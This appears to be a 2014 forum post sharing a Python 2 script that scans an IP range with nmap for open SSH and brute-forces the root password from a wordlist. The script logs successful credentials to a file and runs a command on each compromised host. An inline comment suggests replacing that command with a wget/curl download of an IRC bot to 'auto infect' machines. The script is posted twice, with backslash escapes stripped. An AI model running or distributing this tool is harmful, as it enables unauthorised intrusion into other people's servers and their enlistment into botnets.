CpLover
02-04-2014, 06:28 AM
Python SSH Scanner
#!/usr/bin/python#SSH BruteForcer that scans an ip range for open ssh and bruteforcers
#Version 1.1
import sys, time, StringIO, commands, re
save_file = "sshz.txt"
verbose = 1
user = "root"
try:
import pexpect, pxssh
except(ImportError):
print "nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpectn"
sys.exit(1)
def scan():
ips = []
args = 'nmap -P0 '+ip_range+' -p 22 -open | grep open -B 3'
nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("d*.d*.d*.d*", tmp)
if ipaddr:
ips.append(ipaddr[0])
return ips
def brute(ip, word):
if verbose != 0:
print "Trying:",word
try:
s = pxssh.pxssh()
s.login (ip, user, word, login_timeout=10)
s.sendline (command)
s.prompt()
print "n",s.before
s.logout()
print "t[!] Login Success:",user, word,"n"
logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"n")
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "n[-] Quitn"
logins.close()
sys.exit(1)
if len(sys.argv) != 3:
print "nUsage: ./ssh.py 198.162.1.1-255 words.txt usern"
sys.exit(1)
ip_range = sys.argv[1]
command = 'uname -a' # if you have linux irc bot wget/curl it and run it on this line to make auto infect ;) ~ h1t3m
logins = open(save_file, "a")
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "n[-] Error: Check your wordlist pathn"
sys.exit(1)
print "n[+] Loaded:",len(words),"words"
print "[+] User:",user
print "[+] Save file:",save_file
if verbose != 0:
print "[+] Verbose Mode: On"
else:
print "[+] Verbose Mode: Off"
print "[+] Scanning:",ip_range
print "This might take a min..."
ips = scan()
if len(ips) <= 0:
print "n[-] No ips found running SSHn"
sys.exit(1)
else:
print "n[+] Found:",len(ips),"ips running SSH"
for ip in ips:
print "[+] BruteForcing:",ip,"n"
for word in words:
#Change this time if needed
time.sleep(0.5)
brute(ip, word.replace("n",""))
logins.close()
print "n[-] Donen"
#!/usr/bin/python#SSH BruteForcer that scans an ip range for open ssh and bruteforcers
#Version 1.1
import sys, time, StringIO, commands, re
save_file = "sshz.txt"
verbose = 1
user = "root"
try:
import pexpect, pxssh
except(ImportError):
print "nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpectn"
sys.exit(1)
def scan():
ips = []
args = 'nmap -P0 '+ip_range+' -p 22 -open | grep open -B 3'
nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("d*.d*.d*.d*", tmp)
if ipaddr:
ips.append(ipaddr[0])
return ips
def brute(ip, word):
if verbose != 0:
print "Trying:",word
try:
s = pxssh.pxssh()
s.login (ip, user, word, login_timeout=10)
s.sendline (command)
s.prompt()
print "n",s.before
s.logout()
print "t[!] Login Success:",user, word,"n"
logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"n")
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "n[-] Quitn"
logins.close()
sys.exit(1)
if len(sys.argv) != 3:
print "nUsage: ./ssh.py 198.162.1.1-255 words.txt usern"
sys.exit(1)
ip_range = sys.argv[1]
command = 'uname -a' # if you have linux irc bot wget/curl it and run it on this line to make auto infect ;) ~ h1t3m
logins = open(save_file, "a")
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "n[-] Error: Check your wordlist pathn"
sys.exit(1)
print "n[+] Loaded:",len(words),"words"
print "[+] User:",user
print "[+] Save file:",save_file
if verbose != 0:
print "[+] Verbose Mode: On"
else:
print "[+] Verbose Mode: Off"
print "[+] Scanning:",ip_range
print "This might take a min..."
ips = scan()
if len(ips) <= 0:
print "n[-] No ips found running SSHn"
sys.exit(1)
else:
print "n[+] Found:",len(ips),"ips running SSH"
for ip in ips:
print "[+] BruteForcing:",ip,"n"
for word in words:
#Change this time if needed
time.sleep(0.5)
brute(ip, word.replace("n",""))
logins.close()
print "n[-] Donen"